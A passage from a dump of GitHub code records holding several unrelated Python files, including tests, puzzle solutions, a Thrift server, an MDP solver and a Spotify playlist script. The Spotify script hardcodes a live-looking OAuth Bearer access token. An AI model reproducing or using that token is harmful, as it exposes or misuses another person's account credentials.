Yvan #\n# Creation Date : November 18, 2019 #\n# #\n############################################################################################\n\ndef obtain_user_size(input_mess: str) -> int:\n is_valid, user_data = False, int(-1)\n while is_valid is False:\n try:\n user_data = int(input(input_mess))\n if user_data < 0:\n raise ValueError('Invalid number of list.')\n is_valid = True\n except ValueError as ve:\n print(f'[ERROR]: {ve}')\n return user_data\n\ndef create_multiple_lists(max_size: int) -> dict:\n obj = dict()\n for i in range(1, max_size+1):\n obj[str(i)] = []\n return obj\n\nif __name__ == \"__main__\":\n\n user_size = obtain_user_size(input_mess='Enter max number of lists: ')\n multi_list = create_multiple_lists(max_size=user_size)\n print(f'Generated List:\\n{multi_list}')\n","repo_name":"ivenpoker/Python-Projects","sub_path":"Projects/Online Workouts/w3resource/List/program-41.py","file_name":"program-41.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12144474154","text":"import hashlib\nimport time\n\n\ndef getzftsl():\n _time = str(int(time.time()) - 5)\n # print(_time)\n _md5_str = \"zfsw_\" + _time[:-1]\n m = hashlib.md5(_md5_str.encode(\"utf-8\"))\n # print(\"zftsl: \"+m.hexdigest())\n return m.hexdigest()\n\n\nif __name__ == '__main__':\n zftsl = getzftsl()\n print(zftsl)\n","repo_name":"relaxcn/zhimiao_proxy","sub_path":"util/getZFTSL.py","file_name":"getZFTSL.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7018603904","text":"import unittest\nimport copy\n\nfrom explainshell import fixer, options, store\n\nclass test_fixer(unittest.TestCase):\n def setUp(self):\n self._oldfixerscls = fixer.fixerscls[:]\n\n def tearDown(self):\n fixer.fixerscls = self._oldfixerscls\n\n def test_changes(self):\n class myfixer(fixer.basefixer):\n def pre_get_raw_manpage(self):\n self.mctx['foo'] = 'bar'\n\n d = {}\n fixer.fixerscls = [myfixer]\n r = fixer.runner(d)\n self.assertTrue('foo' not in d)\n r.pre_get_raw_manpage()\n self.assertEquals(d['foo'], 'bar')\n\n def test_paragraphjoiner(self):\n maxdistance = fixer.paragraphjoiner.maxdistance\n\n paragraphs = [store.paragraph(i, chr(ord('a') + i), None, False) for i in range(26)]\n options = [\n store.option(paragraphs[0], [], [], False),\n store.option(paragraphs[1], [], [], False),\n store.option(paragraphs[5], [], [], False),\n store.option(paragraphs[5+maxdistance-1], [], [], False),\n store.option(paragraphs[15], [], [], False),\n store.option(paragraphs[17], [], [], False),\n store.option(paragraphs[-1], [], [], False)]\n\n f = fixer.paragraphjoiner(None)\n merged = f._join(paragraphs, options)\n\n #self.assertEquals(merged, 7)\n #self.assertEquals(len(paragraphs), 19)\n self.assertEquals(options[0].text, 'a')\n self.assertEquals(options[1].text.replace('\\n', ''), 'bcde')\n self.assertEquals(options[2].text.replace('\\n', ''), 'fghi')\n self.assertEquals(options[3].text, 'j')\n self.assertEquals(options[4].text.replace('\\n', ''), 'pq')\n self.assertEquals(options[5].text, 'r')\n self.assertEquals(options[6].text, 'z')\n\n # join again to make sure nothing is changed\n oldparagraphs = copy.deepcopy(paragraphs)\n oldoptions = copy.deepcopy(options)\n f._join(paragraphs, options)\n self.assertEquals(oldparagraphs, paragraphs)\n self.assertEquals(oldoptions, options)\n","repo_name":"idank/explainshell","sub_path":"tests/test-fixer.py","file_name":"test-fixer.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":12432,"dataset":"github-code","pt":"48"} +{"seq_id":"43587165928","text":"width = 25\nheight = 6\n\nwith open('in', 'r') as infile:\n line = infile.readline()\n size = width * height\n layers = [line[i:i + size] for i in range(0, len(line), size)]\n\n pixels = {}\n for i, layer in enumerate(layers):\n rows = [layer[i: i + width] for i in range(0, len(layer), width)]\n for y in range(height):\n for x in range(width):\n px = pixels.get((x, y), {})\n px[i] = rows[y][x]\n pixels[(x, y)] = px\n\n final_image = {}\n for coord, l in pixels.items():\n for n in range(len(l)):\n val = l[n]\n if val != '2':\n final_image[coord] = val\n break\n\n for x in range(width+1):\n print('#', end='')\n print('')\n for y in range(height):\n print('#', end='')\n for x in range(width):\n color = final_image[(x, y)]\n if color == '0':\n print('#', end='')\n elif color == '1':\n print(' ', end='')\n print('')\n for x in range(width+1):\n print('#', end='')\n","repo_name":"bo0tzz/AdventOfCode","sub_path":"2019/08/08.2.py","file_name":"08.2.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42453723809","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxProduct(self, root: Optional[TreeNode]) -> int:\n self.values = []\n root_sum = self.get_sum_of_node(root)\n\n maximum = 0\n for val in self.values:\n product = val * (root_sum - val)\n if product > maximum:\n maximum = product\n return maximum % (pow(10, 9) + 7)\n\n def get_sum_of_node(self, node):\n if not node:\n return 0\n\n self_sum = self.get_sum_of_node(node.left) + \\\n self.get_sum_of_node(node.right) + node.val\n self.values.append(self_sum)\n\n return self_sum\n","repo_name":"versenyi98/programming-contests","sub_path":"LeetCode/1339. Maximum Product of Splitted Binary Tree/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7964432109","text":"from config import PILAS_SCREEN_X, PILAS_SCREEN_Y\n\n\ndef esta_fuera_de_la_pantalla(actor):\n if actor.fijo:\n return False\n\n izquierda = -PILAS_SCREEN_X / 2\n derecha = PILAS_SCREEN_X / 2\n arriba = PILAS_SCREEN_Y / 2\n abajo = -PILAS_SCREEN_Y / 2\n return actor.derecha < izquierda or \\\n actor.izquierda > derecha or \\\n actor.abajo > arriba or \\\n actor.arriba < abajo\n\n\ndef crear_bombas(bombas, actor):\n for i in range(2):\n bombas.agregar(actor())\n\n for bomba in bombas:\n if esta_fuera_de_la_pantalla(bomba):\n bomba.iniciar()\n","repo_name":"humitos/ballsgame","sub_path":"ballsgame/utilidades.py","file_name":"utilidades.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2857999810","text":"# mdp implementation needs to go here\nimport sys\nimport copy\n\ndef mdp(config):\n#inputs 1-5 used in A*\n\tstart = config['starting_pos']\n\tgoal = config['goal']\n\twalls = config['walls']\n\tpits = config['pits']\n\tmove_list = config['possible_moves']\n\tmap_size = config['map_size']\n\n#probabilities of correct movements\n\tprob_f = config['prob_move_forward']\n\tprob_b = config['prob_move_backward']\n\tprob_l = config['prob_move_left']\n\tprob_r = config['prob_move_right']\n\n#rewards for things\n\treward_step = config['reward_for_each_step']\n\treward_wall = config['reward_for_hitting_wall']\n\treward_goal = config['reward_for_reaching_goal']\n\treward_pit = config['reward_for_falling_in_pit']\n\n#numbers important for the mdp algorithm\n\tdiscount_factor = config['discount_factor']\n\tmax_iterations = config['max_iterations']\n\tthreshold_difference = config['threshold_difference'] \n\n\tpolicy_map = [[\"\" for y in range(map_size[1])] for x in range(map_size[0])]\n\n\tvalue_map = [[0.0 for y in range(map_size[1])] for x in range(map_size[0])]\n\n\tfor wall in walls:\n\t\tpolicy_map[wall[0]][wall[1]] = \"WALL\"\n\t\tvalue_map[wall[0]][wall[1]] =0.0# reward_wall \n\tfor pit in pits:\n\t\tpolicy_map[pit[0]][pit[1]] = \"PIT\"\n\t\tvalue_map[pit[0]][pit[1]] = 0.0#reward_pit\n\n\tpolicy_map[goal[0]][goal[1]] = \"GOAL\"\n\tvalue_map[goal[0]][goal[1]] = 0.0#reward_goal \n\n\n\titerations = 0\n\tconverge = 0\n#TODO still need to figure publishing\n# this is the FULLY OPERATIONAL mdp\n\twhile(iterations < max_iterations):\n\t\tnew_value_map = copy.deepcopy(value_map)\n\t\t#iterate through each cell and calculate the thing\n\t\tfor row,(rowp,rowv) in enumerate(zip(policy_map,value_map)):\n\t\t\tfor col,(valp,valv) in enumerate(zip(rowp,rowv)):\n\t\t\t\t#iterate through all possible moves from a cell\n\t\t\t\tif valp == \"WALL\" or valp == \"GOAL\" or valp == \"PIT\":\n\t\t\t\t\tcontinue\n\t\t\t\tmaxv = -sys.maxint-1 \n\t\t\t\tmaxp = \"\"\n\t\t\t\tfor move in move_list:\n\t\t\t\t\tif not row+move[0] in range(0,map_size[0]) or not col+move[1] in range(0,map_size[1]):\n\t\t\t\t\t\tforward = valv \n\t\t\t\t\t\treward_f = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tforward = new_value_map[row+move[0]][col+move[1]]\n\t\t\t\t\t\tcell = policy_map[row+move[0]][col+move[1]]\n\t\t\t\t\t\treward_f = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_f += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_f += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tforward = valv\n\t\t\t\t\t\t\treward_f = reward_wall\n\n\t\t\t\t\tif not row-move[0] in range(0,map_size[0]) or not col-move[1] in range(0,map_size[1]):\n\t\t\t\t\t\tbackward = valv \n\t\t\t\t\t\treward_b = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tbackward =new_value_map[row-move[0]][col-move[1]]\n\t\t\t\t\t\tcell =policy_map[row-move[0]][col-move[1]]\n\t\t\t\t\t\treward_b = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_b += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_b += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tbackward = valv\n\t\t\t\t\t\t\treward_b = reward_wall\n\n\t\t\t\t\tif not row-move[1] in range(0,map_size[0]) or not col-move[0] in range(0,map_size[1]):\n\t\t\t\t\t\tleft = valv\n\t\t\t\t\t\treward_l = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tleft = new_value_map[row-move[1]][col-move[0]]\n\t\t\t\t\t\tcell = policy_map[row-move[1]][col-move[0]]\n\t\t\t\t\t\treward_l = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_l += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_l += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tleft = valv\n\t\t\t\t\t\t\treward_l = reward_wall\n\n\t\t\t\t\tif not row+move[1] in range(0,map_size[0]) or not col+move[0] in range(0,map_size[1]): \n\t\t\t\t\t\tright = valv\n\t\t\t\t\t\treward_r = reward_wall\n\t\t\t\t\telse:\n\t\t\t\t\t\tright = new_value_map[row+move[1]][col+move[0]]\n\t\t\t\t\t\tcell = policy_map[row+move[1]][col+move[0]]\n\t\t\t\t\t\treward_r = reward_step\n\t\t\t\t\t\tif cell == \"GOAL\":\n\t\t\t\t\t\t\treward_r += reward_goal\n\t\t\t\t\t\tif cell == \"PIT\":\n\t\t\t\t\t\t\treward_r += reward_pit\n\t\t\t\t\t\tif cell == \"WALL\":\n\t\t\t\t\t\t\tright = valv\n\t\t\t\t\t\t\treward_r = reward_wall\n\n\t\t\t\t\tv_f = prob_f*(reward_f+(discount_factor*forward))\n\t\t\t\t\tv_b = prob_b*(reward_b+(discount_factor*backward))\n\t\t\t\t\tv_l = prob_l*(reward_l+(discount_factor*left))\n\t\t\t\t\tv_r = prob_r*(reward_r+(discount_factor*right))\n\t\t\t\t\tsumm = v_f + v_b + v_l + v_r\n\n\t\t\t\t\t#get the maximum value and policy\n\t\t\t\t\tif summ > maxv:\n\t\t\t\t\t\tmaxv = summ\n\t\t\t\t\t\tif move == [0,1]:\n\t\t\t\t\t\t\tmaxp = \"E\"\n\t\t\t\t\t\telif move == [0,-1]:\n\t\t\t\t\t\t\tmaxp = \"W\"\n\t\t\t\t\t\telif move == [1,0]:\n\t\t\t\t\t\t\tmaxp = \"S\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tmaxp = \"N\"\n\t\t\t\tpolicy_map[row][col] = maxp\n\t\t\t\tnew_value_map[row][col] = maxv\n\n\n\t\t\n\t\t#determine convergence\n\t\tdiff = absolute_diff(value_map,new_value_map,policy_map)\n\t\tif diff < threshold_difference:\n\t\t\tconverge += 1\n\t\telse:\n\t\t\tconverge = 0\n\n\t\tvalue_map = new_value_map\n\t\titerations += 1\n\t\tif converge == 2:\n\t\t\tbreak\n\t\n#flat_policy_map = [x for y in policy_map for x in y]\n\treturn policy_map\n\n\n\n\n#function for finding absolute difference to determine convergence\ndef absolute_diff(a,b,policy_map):\n\tsumm = 0\n\tfor rowv_a,rowv_b,rowp in zip(a,b,policy_map):\n\t\tfor colv_a,colv_b,colp in zip(rowv_a,rowv_b,rowp):\n\t\t\tif colp != \"WALL\" and colp != \"PIT\" and colp != \"GOAL\":\n\t\t\t\tsumm += abs(colv_a-colv_b)\n\treturn summ\n","repo_name":"andynaguyen/cse190_final_assignment","sub_path":"scripts/mdp.py","file_name":"mdp.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43149556874","text":"# All Elements in Two Binary Search Trees\n\n# Given two binary search trees root1 and root2.\n#\n# Return a list containing all the integers from both trees sorted in ascending order.\n#\n#\n#\n# Example 1:\n#\n#\n# Input: root1 = [2,1,4], root2 = [1,0,3]\n# Output: [0,1,1,2,3,4]\n# Example 2:\n#\n# Input: root1 = [0,-10,10], root2 = [5,1,7,0,2]\n# Output: [-10,0,0,1,2,5,7,10]\n# Example 3:\n#\n# Input: root1 = [], root2 = [5,1,7,0,2]\n# Output: [0,1,2,5,7]\n# Example 4:\n#\n# Input: root1 = [0,-10,10], root2 = []\n# Output: [-10,0,10]\n# Example 5:\n#\n#\n# Input: root1 = [1,null,8], root2 = [8,1]\n# Output: [1,1,8,8]\n#\n#\n# Constraints:\n#\n# Each tree has at most 5000 nodes.\n# Each node's value is between [-10^5, 10^5].\n\n# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def getAllElements(self, root1: TreeNode, root2: TreeNode) -> List[int]:\n def middle_order(node: TreeNode, l: List[int]):\n if node:\n middle_order(node.left, l)\n l.append(node.val)\n middle_order(node.right, l)\n\n res = []\n l1 = []\n l2 = []\n middle_order(root1, l1)\n middle_order(root2, l2)\n i = 0\n j = 0\n while i < len(l1) and j < len(l2):\n if l1[i] <= l2[j]:\n res.append(l1[i])\n i += 1\n else:\n res.append(l2[j])\n j += 1\n\n while i < len(l1):\n res.append(l1[i])\n i += 1\n\n while j < len(l2):\n res.append(l2[j])\n j += 1\n return res\n","repo_name":"TTVidi/leetcode-python","sub_path":"src/leetcode/medium/solution1305.py","file_name":"solution1305.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36882101585","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n__author__ = 'David Zhang'\n\nfrom thrift import Thrift\nfrom thrift.transport import TSocket, TTransport\nfrom thrift.protocol import TCompactProtocol\nfrom thrift.server import TServer\nfrom pythrift import PersonService, ttypes\n\n\nclass PersonServiceHandler(PersonService.Iface):\n\n def getPersonByUsername(self, username):\n return ttypes.Person(username, 20, False)\n\n def savePerson(self, person):\n print(person)\n\n\nif __name__ == '__main__':\n try:\n TServer.TSimpleServer(\n PersonService.Processor(PersonServiceHandler()),\n # 注意py3的socket tcp通信默认采用tcpv6\n TSocket.TServerSocket(host='127.0.0.1', port=8899),\n TTransport.TFramedTransportFactory(),\n TCompactProtocol.TCompactProtocolFactory()\n ).serve()\n except Thrift.TException as ex:\n print(ex)\n\n","repo_name":"ZhangQi1996/netty-all","sub_path":"thrift/src/main/python/rpc_proj/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3704701378","text":"import distutils.core\n\ntry:\n\timport setuptools\nexcept ImportError:\n\tpass\n\nwith open('README.md', 'r') as fh:\n\tlong_description = fh.read()\n\npackages = ['tornado', 'pyconvert']\n\ndistutils.core.setup(\n\tname='aiopyrestful',\n\tversion='1.4.1',\n\tpackages=['aiopyrestful'],\n\tauthor='DarHarry',\n\tauthor_email='harryx520@qq.com',\n\tdescription='Restful framework with Tornado',\n\tlong_description=long_description,\n\tlong_description_content_type=\"text/markdown\",\n\turl='https://github.com/HarryHEi/aiopyrestful',\n\tinstall_requires=packages,\n\tclassifiers=[\n\t\t'Programming Language :: Python :: 3'\n\t]\n)\n","repo_name":"HarryHEi/aiopyrestful","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"15198799687","text":"import entity\nimport event_handlers\nimport fonts\nimport minefield\nimport game_loop\n\nW = 50\nH = 50\ngrid = []\nfirst_click = True\nmines: minefield.MineField\nmine_size = 10\nnum_mines = 20\n\n\nclass Button(entity.Entity):\n mines_around: int\n\n def __init__(self, x, y, index_x, index_y):\n super().__init__(x, y, W, H)\n self.index_x = index_x\n self.index_y = index_y\n self.mined = self.flagged = False\n\n self.set_color((255, 255, 255))\n\n def mine(self):\n if not self.flagged:\n self.mined = True\n self.set_color((0, 0, 0))\n if self.is_mine():\n for b in grid:\n if b.is_mine():\n b.set_color((128, 128, 128))\n elif b.flagged:\n b.set_color((255, 255, 255))\n game_loop.playing = False\n elif self.mines_around == 0:\n self.mine_surrounding()\n elif self.mines_around != 0:\n self.show_mine_number()\n\n check_win()\n\n def flag(self):\n if self.flagged:\n mines.flags += 1\n self.flagged = False\n self.set_color((255, 255, 255))\n self.show_mine_number()\n elif not self.mined and mines.flags > 0:\n mines.flags -= 1\n self.flagged = True\n self.set_color((255, 0, 0))\n mines.check_mines()\n\n def mine_surrounding(self):\n for button in self.get_all_buttons_around():\n if not button.mined and not button.flagged and not button.is_mine():\n button.mine()\n\n def show_mine_number(self):\n if self.mines_around != 0 and not self.is_mine():\n self.img.blit(fonts.main_font.render(str(self.mines_around), False, (255, 255, 255)), (5, 3))\n\n def is_mine(self):\n return mines.has_mine[self.index_x][self.index_y]\n\n def get_mines_around(self):\n num = 0\n for x in range(max(self.index_x - 1, 0), min(self.index_x + 2, mine_size), 1):\n for y in range(max(self.index_y - 1, 0), min(self.index_y + 2, mine_size), 1):\n if (x != self.index_x or y != self.index_y) and mines.has_mine[x][y]:\n num += 1\n return num\n\n def get_buttons_around(self):\n buttons = []\n for x in range(max(self.index_x - 1, 0), min(self.index_x + 2, mine_size), 1):\n for y in range(max(self.index_y - 1, 0), min(self.index_y + 2, mine_size), 1):\n if (x + y) % 2 != (self.index_y + self.index_x) % 2:\n buttons.append(grid[mine_size * x + y])\n return buttons\n\n def get_all_buttons_around(self, num_spaces=1):\n buttons = []\n for index in self.get_surrounding_indexes(num_spaces):\n buttons.append(grid[index])\n return buttons\n\n def on_first_click(self):\n global mines\n indexes = self.get_surrounding_indexes(2)\n indexes.append(self.index_x * mine_size + self.index_y)\n mines = minefield.MineField(mine_size, num_mines, indexes)\n\n for button in grid:\n if button.is_mine():\n mines.mines.append(button)\n button.mines_around = button.get_mines_around()\n\n def get_surrounding_indexes(self, num_spaces=1):\n indexes = []\n for x in range(max(self.index_x - num_spaces, 0), min(self.index_x + num_spaces + 1, mine_size), 1):\n for y in range(max(self.index_y - num_spaces, 0), min(self.index_y + num_spaces + 1, mine_size), 1):\n if x != self.index_x or self.index_y != y:\n indexes.append(x * mine_size + y)\n return indexes\n\n\ndef check_win():\n for button in grid:\n if not button.is_mine():\n if not button.mined:\n return\n game_loop.won = True\n\n\ndef create_grid(pos, length):\n global grid\n for i in range(length):\n for j in range(length):\n grid.append(Button(pos[0] + i * (W + 5), pos[1] + j * (H + 5), i, j))\n return grid\n\n\ndef button_in_grid(pos):\n for button in grid:\n if button.intersects_point(pos):\n return button\n","repo_name":"ChadTheSecondEthan/minesweeper","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":4160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32515696276","text":"\nfrom ctypes import util\nimport traceback\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom .utils.settings import WechatSettings\n\nwechat_settings = WechatSettings()\n\nfrom .admins import (\n WechatConfiguration as WechatConfigurationAdmin,\n WechatUser as WechatUserAdmin,\n)\nfrom .models import (\n WechatConfiguration as WechatConfigurationModel,\n WechatUser as WechatUserModel,\n)\n\n\n\nclass Wechat:\n\n def __init__(self,app=None,admin=None,db=None):\n if None not in [app,admin,db,]:\n self.init_app(app,admin,db)\n\n def init_app(self,app,admin,db):\n\n app.wechat = self\n\n admin.add_view(WechatConfigurationAdmin(name='微信设置',category=\"微信数据\"))\n admin.add_view(WechatUserAdmin(WechatUserModel, db.session, name=u'微信用户',category=\"微信数据\"))\n\n from .views.v1 import bp as bp_views\n app.register_blueprint(\n bp_views,\n url_prefix='/{}/wechat/'.format(\n app.config['PROJECT_NAME'],\n )\n )\n\n from .apis.v1 import (\n bp as bp_apis,\n )\n app.register_blueprint(\n bp_apis,\n url_prefix='/{}/api/v1/'.format(\n app.config['PROJECT_NAME'],\n )\n )\n","repo_name":"cllen/boilerplate-flask","sub_path":"server/applications/wechat/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9534972410","text":"'''\nCounting Organizations\nThis application will read the mailbox data (mbox.txt) count up the number\nemail messages per organization (i.e. domain name of the email address)\nusing a database with the following schema to maintain the counts.\n'''\n\n\nimport sqlite3, re\n\nconn = sqlite3.connect('email-db.sqlite')\ncurs = conn.cursor()\n\ncurs.execute('DROP TABLE IF EXISTS Counts')\ncurs.execute('CREATE TABLE Counts (org TEXT, count INTEGER)')\n\nfh = open('mbox.txt')\nfor line in fh:\n if not line.startswith('From: ') : continue\n email = \"\".join(re.findall('(?<=@).+', line))\n print (email)\n \n curs.execute('SELECT count FROM Counts WHERE org=?', (email, ))\n row = (curs.fetchone())\n if row is None:\n curs.execute('INSERT INTO Counts (org, count) VALUES (?, 1)', (email,))\n else:\n curs.execute('UPDATE Counts SET count=count+1 WHERE org=?', (email,))\n conn.commit()\n\ncurs.close()\n","repo_name":"sujinleeme/my-python-journey","sub_path":"PR4E/Database/week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32224143396","text":"from shape_parser import Program, ProgramLine\nfrom typing import List, Union\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\ndef create_graph_from_program(program: Program) -> nx.DiGraph:\n G = nx.DiGraph()\n for program_line in program.program_lines:\n G.add_edge(*program_line.get_edge_label())\n return G\n\nclass ControlFlowGraph:\n def __init__(self, program: Program):\n self.program: Program = program\n self.nodes: List[int] = self.program.get_all_labels()\n \n def plot_graph(self):\n graph: nx.DiGraph = create_graph_from_program(self.program)\n pos = nx.spring_layout(graph)\n plt.figure()\n\n edge_labels: dict = {}\n for program_line in self.program.program_lines:\n edge_labels[program_line.get_edge_label] = str(program_line.command)\n\n nx.draw(graph, pos=pos, edge_color='black', width=1, linewidths=1, node_size=500, node_color='cyan',\n labels={node: node for node in graph.nodes()})\n \n nx.draw_networkx_edge_labels(graph, pos,\n edge_labels={program_line.get_edge_label(): str(program_line.command)\n for program_line in self.program.program_lines},\n font_size=16)\n\n plt.show()\n\n def ingoing_edges(self, node: int) -> List[ProgramLine]:\n return [program_line for program_line in self.program.program_lines\n if program_line.end_label == node]\n\n def outgoing_edges(self, node: int) -> List[ProgramLine]:\n return [program_line for program_line in self.program.program_lines\n if program_line.start_label == node]\n\n def find_start_label(self) -> int:\n for node in self.nodes:\n if len(self.ingoing_edges(node)) == 0:\n return node\n raise SyntaxError(\"Could not find a starting label!\")\n","repo_name":"yarinluh/Shape-Analysis-Final-Project","sub_path":"control_flow_graph.py","file_name":"control_flow_graph.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32508040612","text":"'''\n7. Obter o menor inteiro que seja maior ou igual ao número real x, utilizando a função MenorInteiro abaixo:\n\ndef MenorInteiro(x)\n'''\n\ndef MenorInteiro(x):\n inteiro = round(x)\n if inteiro < x:\n inteiro +=1\n return inteiro\n\nx = float(input())\nprint(f'O menor inteiro é {MenorInteiro(x)}')\n \n","repo_name":"lucas-albuq/PEOO","sub_path":"ListaRev03/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10793413736","text":"from typing import Any, Optional\n\nfrom great_expectations.core.usage_statistics.anonymizers.base import BaseAnonymizer\nfrom great_expectations.data_context.store.store import Store\n\n\nclass StoreAnonymizer(BaseAnonymizer):\n def __init__(\n self,\n aggregate_anonymizer: \"Anonymizer\", # noqa: F821\n salt: Optional[str] = None,\n ) -> None:\n super().__init__(salt=salt)\n\n self._aggregate_anonymizer = aggregate_anonymizer\n\n def anonymize(\n self, store_name: str, store_obj: Store, obj: Optional[object] = None\n ) -> Any:\n anonymized_info_dict = {}\n anonymized_info_dict[\"anonymized_name\"] = self._anonymize_string(store_name)\n store_backend_obj = store_obj.store_backend\n\n self._anonymize_object_info(\n object_=store_obj,\n anonymized_info_dict=anonymized_info_dict,\n )\n\n anonymized_info_dict[\n \"anonymized_store_backend\"\n ] = self._anonymize_store_backend_info(store_backend_obj=store_backend_obj)\n\n return anonymized_info_dict\n\n def _anonymize_store_backend_info(\n self,\n store_backend_obj: Optional[object] = None,\n store_backend_object_config: Optional[dict] = None,\n ) -> dict:\n assert (\n store_backend_obj or store_backend_object_config\n ), \"Must pass store_backend_obj or store_backend_object_config.\"\n anonymized_info_dict = {}\n if store_backend_obj is not None:\n self._anonymize_object_info(\n object_=store_backend_obj,\n anonymized_info_dict=anonymized_info_dict,\n )\n else:\n class_name = store_backend_object_config.get(\"class_name\")\n module_name = store_backend_object_config.get(\"module_name\")\n if module_name is None:\n module_name = \"great_expectations.data_context.store\"\n self._anonymize_object_info(\n object_config={\"class_name\": class_name, \"module_name\": module_name},\n anonymized_info_dict=anonymized_info_dict,\n )\n return anonymized_info_dict\n\n def can_handle(self, obj: Optional[object] = None, **kwargs) -> bool:\n from great_expectations.data_context.store.store import Store\n\n return (obj is not None and isinstance(obj, Store)) or (\n \"store_name\" in kwargs or \"store_obj\" in kwargs\n )\n","repo_name":"franciscojavierarceo/Python","sub_path":"demos/great-expectations/venv/lib/python3.8/site-packages/great_expectations/core/usage_statistics/anonymizers/store_anonymizer.py","file_name":"store_anonymizer.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"42424074633","text":"import requests\nimport random\nimport json\n\nfrom Genetics import *\nfrom MyRequests import *\nfrom Graph import *\n\n#playlistURI = '5Pa5jw42sPQ9SEKu4dEuZN'\n\nheaders = {'Accept': 'application/json','Authorization': 'Bearer BQCDi_fPb_43-4ThvnrQrah03KNMmPUuD003TqDWG_mc-DqDQ5xN55p0PzRNT7BDmq2P2yU4shXR6YPzvwVDga7YTQPIORn71uoMUyQy_tjAXqKKL2JzGH6BR17f82BKqz8ZT5pLQoOOZsxHeHnyKl8I3C3UvAkpTjmk0yXV3P3GYlsGAbaOzmCNM5D78ReoSpaqSS21BSdeiMncdGIWmTpzZxHKm1de9I4Z7tHet8xOlOFJT2rAY8UfNrjA4ODm-0ve2jw_sCgTfnWE1FIOoclJDa9yUm2dAmE'}\n\nGET_USERS_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists?'\nGET_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}'\nGET_PLAYLIST_TRACKS_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}/tracks'\nGET_AUDIO_FEATURES = 'https://api.spotify.com/v1/audio-features/{id}'\nMAKE_PLAYLIST_ENDPOINT = 'https://api.spotify.com/v1/users/{user_id}/playlists'\nADD_TRACK_TO_PLAYLIST_ENDPOINT = \"https://api.spotify.com/v1/users/{user_id}/playlists/{playlist_id}/tracks\"\n\ndef getPlaylists(token, userID):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = GET_USERS_PLAYLIST_ENDPOINT.format(user_id=userID)\n\tresp = requests.get(url, headers=headers)\n\titems = resp.json()['items']\n\tplaylists = []\n\tfor item in items:\n\t\tif(item['owner']['id'] == userID):\n\t\t\tplaylist = []\n\t\t\tplaylist.append(item['name'])\n\t\t\tplaylist.append(item['id'])\n\t\t\tplaylists.append(playlist)\n\treturn playlists\n\ndef getPlaylistTracks(playlistID, userID, token):\n\theaders = {'Accept': 'application/json','Authorization': 'Bearer '+token}\n\turl = 